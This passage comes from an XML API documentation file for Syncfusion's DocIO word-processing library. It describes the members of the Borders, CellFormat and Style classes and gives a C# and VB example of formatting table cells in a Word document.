            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.Clone">
            <summary>
            Creates duplicate copy of the entity.
            </summary>
            <returns>The reference to the newly created <see cref="T:Syncfusion.DocIO.DLS.Borders"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.CloneImpl">
            <summary>
            Creates duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An object that can be casted as <see cref="T:Syncfusion.DocIO.DLS.Borders"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.SetDefaultProperties">
            <summary>
            Sets the default properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.SetSpacing(System.Single)">
            <summary>
            Sets spacing for all 
            </summary>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.IsAdjacentBorderSame(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border)">
            <summary>
            Check if adjacent paragraph bottom borders are same
            </summary>
            <param name="currentParagraphBorder">Currentaragraph</param>
            <param name="nextParagraphBorder">The bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.InitBorders">
            <summary>
            Init borders owner
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.UpdateSourceFormatting(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Updates the source formatting.
            </summary>
            <param name="borders">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.Compare(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Compare Borders
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.NoBorder">
            <summary>
            Gets a value indicating whether the border exists. Read-only.
            </summary>
            <value><b>True</b> if there is no border; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Left">
            <summary>
            Gets the left border. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Border"/> for left.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Top">
            <summary>
            Gets the top border. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Border"/> for top.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Right">
            <summary>
            Gets the right border. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Border"/> for right.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Bottom">
            <summary>
            Gets the bottom border. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Border"/> for bottom.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Vertical">
            <summary>
            Gets the vertical border. Read-only.
            </summary>
            <value>The vertical <see cref="T:Syncfusion.DocIO.DLS.Border"/>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Horizontal">
            <summary>
            Gets horizontal border. Read-only.
            </summary>
            <value>The horizontal <see cref="T:Syncfusion.DocIO.DLS.Border"/>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.DiagonalDown">
            <summary>
            Gets diagonal border from top left corner to bottom right corner.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.DiagonalUp">
            <summary>
            Gets diagonal border from bottom left corner to top right corner.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Color">
            <summary>
            Sets color of the borders. Write-only.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> for left, right, top and bottom borders.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.LineWidth">
            <summary>
            Sets width of the borders. Write-only.
            </summary>
            <value>The <b>float </b> value specifies the line width for left, right, top and bottom borders.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.BorderType">
            <summary>
            Sets style of the borders. Write-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BorderStyle"/> member that specifies the style for left, right, top, bottom, vertical and horizontal borders.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Space">
            <summary>
            Sets width of space to maintain between borders and text within borders. Write-only.
            </summary>
            <value>The <b>float</b> that specifies the width of the space.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.Shadow">
            <summary>
            Sets whether borders should be drawn with shadow. Write-only.
            </summary>
            <value><b>True</b> if shadow should be drawn; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.CurrentCell">
            <summary>
            Gets owner borders cell
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.CurrentRow">
            <summary>
            Gets owner borders row
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.IsHTMLRead">
            <summary>
            Gets or sets a value indicating the opening of HTML
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Borders.IsRead">
            <summary>
            Document is presently read
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CellFormat">
            <summary>
            Represents the cell formatting options for table cell.
            </summary>
            <example>
            <para>The following code example demonstrates how to apply cell formatting options to a <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/></para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                document.Open("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Access the instance of the first row in the table
                WTableRow row = table.Rows[0];
                //Specify the row height
                row.Height = 20;
                //Specify the row height type
                row.HeightType = TableRowHeightType.AtLeast;
                //Access the instance of the first cell in the row
                WTableCell cell = row.Cells[0];
                //Specify the cell back ground color
                cell.CellFormat.BackColor = Color.FromArgb(192, 192, 192);
                //Specify the same padding as table option as false to preserve current cell padding
                cell.CellFormat.SamePaddingsAsTable = false;
                //Specify the left, right, top and bottom padding of the cell
                cell.CellFormat.Paddings.Left = 5;
                cell.CellFormat.Paddings.Right = 5;
                cell.CellFormat.Paddings.Top = 5;
                cell.CellFormat.Paddings.Bottom = 5;
                //Specify the vertical alignment of content of text
                cell.CellFormat.VerticalAlignment = VerticalAlignment.Middle;
                //Access the instance of the second cell in the row
                cell = row.Cells[1];
                cell.CellFormat.BackColor = Color.FromArgb(192, 192, 192);
                cell.CellFormat.SamePaddingsAsTable = false;
                //Specify the left, right, top and bottom padding of the cell
                cell.CellFormat.Paddings.All = 5;
                cell.CellFormat.VerticalAlignment = VerticalAlignment.Middle;
                document.Save("TableCellFormatting.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                document.Open("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Access the instance of the first row in the table
                Dim row As WTableRow = table.Rows(0)
                'Specify the row height
                row.Height = 20
                'Specify the row height type
                row.HeightType = TableRowHeightType.AtLeast
                'Access the instance of the first cell in the row
                Dim cell As WTableCell = row.Cells(0)
                'Specify the cell back ground color
                cell.CellFormat.BackColor = Color.FromArgb(192, 192, 192)
                'Specify the same padding as table option as false to preserve current cell padding
                cell.CellFormat.SamePaddingsAsTable = False
                'Specify the left, right, top and bottom padding of the cell
                cell.CellFormat.Paddings.Left = 5
                cell.CellFormat.Paddings.Right = 5
                cell.CellFormat.Paddings.Top = 5
                cell.CellFormat.Paddings.Bottom = 5
                'Specify the vertical alignment of content of text
                cell.CellFormat.VerticalAlignment = VerticalAlignment.Middle
                'Access the instance of the second cell in the row
                cell = row.Cells(1)
                cell.CellFormat.BackColor = Color.FromArgb(192, 192, 192)
                cell.CellFormat.SamePaddingsAsTable = False
                'Specify the left, right, top and bottom padding of the cell
                cell.CellFormat.Paddings.All = 5
                cell.CellFormat.VerticalAlignment = VerticalAlignment.Middle
                document.Save("TableCellFormatting.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.BordersKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.VrAlignmentKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.PaddingsKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.ShadingColorKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.ForeColorKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.VerticalMergeKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.TextureStyleKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.HorizontalMergeKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.TextWrapKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.FitTextKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.TextDirectionKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.CellWidthKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.m_ownerRowFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellFormat.m_xmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.CellFormat"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.UpdateCellFormat(System.Int32)">
            <summary>
            Updates the cell format.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.UpdateCellDescriptor(System.Int32)">
            <summary>
            
            </summary>
            <param name="propertyKey"></param> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetOwnerRowFormat">
            <summary>
            Gets the owner row format.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetTableCellDesc">
            <summary>
            Gets the table cell descriptor.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetCellShadingDescriptor">
            <summary>
            Gets the cell shading descriptor.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetCellSpacings">
            <summary>
            Gets the cell spacings.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.UpdateCellDescriptors">
            <summary>
            Updates the cell descriptors.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetOwnerCellIndex">
            <summary>
            Gets the index of the owner cell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.HasSamePaddingsAsTable">
            <summary>
            Determines whether cell has same paddings as table.
            </summary>
            <returns>
            	if it has same paddings as table, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.UpdateHorizontalMerge(Syncfusion.DocIO.DLS.CellMerge@)">
            <summary>
            Update horizontal merge based on the previous adjacent cells.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.HasValue(System.Int32)">
            <summary>
            Determines whether the specified property key has value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns>
            	if the specified property key has value, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> specifying the key value of the property.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ImportContainer(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the container.
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ImportXmlProps(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Imports the XML properties.
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ImportMembers(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the members.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.SetCellDescriptor(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Sets the cell descriptor.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.UpdateCellFormat(Syncfusion.DocIO.DLS.TableStyleCellProperties)">
            <summary>
            Updates the cell format.
            </summary>
            <param name="cellProperties">The cell properties.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.PropToFormat(System.Int32)">
            <summary>
            Converts cell and table row descriptor's data to cell format.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.UpdateShading">
            <summary>
            Updates the shading.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ExportCellBorders">
            <summary>
            Exports cell borders.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ApplyParentRowFormat(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Applies the parent row format.
            </summary>
            <param name="rowFormat">The row format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ImportBorderSettings(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Updates the border settings.
            </summary>
            <param name="borders">The borders.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CellFormat.ImportPaddings(Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Imports the paddings.
            </summary>
            <param name="basePaddings">The base paddings.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.CancelOnChange">
            <summary>
            Gets or sets a value indicating whether [cancel on change].
            </summary>
            <value>
              <c>true</c> if [cancel on change]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.Hidden">
            <summary>
            Get's / Set's the Hidden property of the cell
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.PreferredWidth">
            <summary>
            Gets or sets the preferred width of the cell.
            </summary>
            <value>The preferred width of the cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.Borders">
            <summary>
            Gets the borders for the cell.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Borders"/> that specifies the borders of the cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.Paddings">
            <summary>
            Gets the cell paddings. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Paddings"/> for the cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.VerticalAlignment">
            <summary>
            Gets or sets the vertical alignment of the cell content.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.VerticalAlignment"/> member that specifies the vertical alignment of cell content.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.BackColor">
            <summary>
            Gets or sets the background color for cell.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> for cell background.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.VerticalMerge">
            <summary>
            Gets or sets the way of combining of the cell vertically.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.CellMerge"/> member that specifies the way of vertical merging.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.HorizontalMerge">
            <summary>
            Gets or sets the way of combining of the cell horizontally.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.CellMerge"/> member that specifies the way of horizontal merging.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.TextWrap">
            <summary>
            Gets or sets a value indicating whether the text wrapping is set.
            </summary>
            <value><c>True</c> if it has text wrapping properties; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.FitText">
            <summary>
            Gets or sets fit text option of the cell.
            </summary>
            <value><b>True</b> if the fit text option is enabled; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.TextDirection">
            <summary>
            Gets or sets cell text direction.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextDirection"/> member that specifies the type of text direction.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.SamePaddingsAsTable">
            <summary>
            Gets or sets value indicating whether to use same paddings as the table. 
            </summary>
            <value><b>True</b> if it has same padding values as table; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.OwnerRowFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.CellDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.CurCellIndex">
            <summary>
            Gets the index of the current cell in the row.
            </summary>
            <value>The index of the current cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.CellWidth">
            <summary>
            Gets or sets the width of the cell.
            </summary>
            <value>The width of the cell.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.ForeColor">
            <summary>
            Gets or sets the color of the fore.
            </summary>
            <value>The color of the fore.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.TextureStyle">
            <summary>
            Gets or sets the texture style.
            </summary>
            <value>The texture style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.XmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CellFormat.HideMark">
            <summary>
            Hides the current row
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListOverrideStyle">
            <summary>
            Represents the overrides for list style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Style">
            <summary>
            Represents the paragraph and character styles. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IStyle">
            <summary>
            Represents the style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyle.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/>, creating duplicate style.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyle.Name">
            <summary>
            Gets or sets the style name.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyle.StyleType">
            <summary>
            Gets the type of the style. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/> member that specifies the type of the style.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.DEF_USER_STYLE_ID">
            <summary>
            Represents the constant style Id.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.m_baseStyle">
            <summary>
            Represents the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.m_chFormat">
            <summary>
            Represents the <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> object.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.m_nextStyle">
            <summary>
            Represents the string to identify style names
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.m_linkStyle">
            <summary>
            Represents the string to identify style names
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.m_typeCode">
            <summary>
            Represents the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordStyleType"/>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.m_tapx">
            <summary>
            Represents the byte array.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Style"/> class with the 
            specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.ApplyBaseStyle(System.String)">
            <summary>
            Applies the base style for current style.
            </summary>
            <param name="styleName">The <b>string</b> that represents the style name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.ApplyBaseStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Applies the base style for the current style.
            </summary>
            <param name="bStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the built-in style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/>, creating duplicate style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.ApplyBaseStyle(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Applies base style for current style.
            </summary>
            <param name="baseStyle">The base style</param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.RemoveBaseStyle">
            <summary>
            Removes the base style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.SetStyleName(System.String)">
            <summary>
            Set the name of the style.
            </summary>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CloneImpl">
            <summary>
            Clones style, creates duplicate copy of the style.
            <exclude/>
            </summary>
            <returns>The cloned element</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.HasGuid(System.String,System.String@)">
            <summary>
            Determines whether the style has Guid
            </summary>
            <param name="style">Style</param>
            <param name="guid">guid</param>
            <returns>
            Returns true, if style name contains Guid.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.Compare(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Compares the properties of current style with specified style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.ImportStyleTo(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Imports the style to destination document.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CompareAndImportStyle(Syncfusion.DocIO.DLS.Style,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Compare style with document style collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.AddNewStyle(Syncfusion.DocIO.DLS.WordDocument,System.Boolean)">
            <summary>
            Creates a cloned copy of the style and adds to the destination document.
            </summary>
            <param name="doc">The document</param>
            <param name="clonedStylesHolder">The cloned Styles Holder</param>
            <returns></returns>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.GetStyleNameId(System.String)">
            <summary>
            Gets style name Id.
            </summary>
            <param name="styleName"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CreateBuiltinStyle(Syncfusion.DocIO.DLS.BuiltinStyle,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Creates the built-in paragraph style.
            </summary>
            <param name="bStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the built-in style.</param>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CreateBuiltinCharacterStyle(Syncfusion.DocIO.DLS.BuiltinStyle,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Creates the built-in character style.
            </summary>
            <param name="bStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the built-in style.</param>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CreateBuiltinStyle(Syncfusion.DocIO.DLS.BuiltinTableStyle,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Creates the built-in table style.
            </summary>
            <param name="bstyle">The built in style.</param>
            <param name="doc">The document.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.CreateBuiltinStyle(Syncfusion.DocIO.DLS.BuiltinStyle,Syncfusion.DocIO.DLS.StyleType,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Creates the built-in style.
            </summary>
            <param name="bStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the built-in style.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/> member that specifies the type of the style.</param>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltInToName(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Built into name.
            </summary>
            <param name="bstyle">The built in style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltInToName(Syncfusion.DocIO.DLS.BuiltinTableStyle)">
            <summary>
            Built into name.
            </summary>
            <param name="bstyle">The built in style.</param>
            <returns></returns>
        </member>
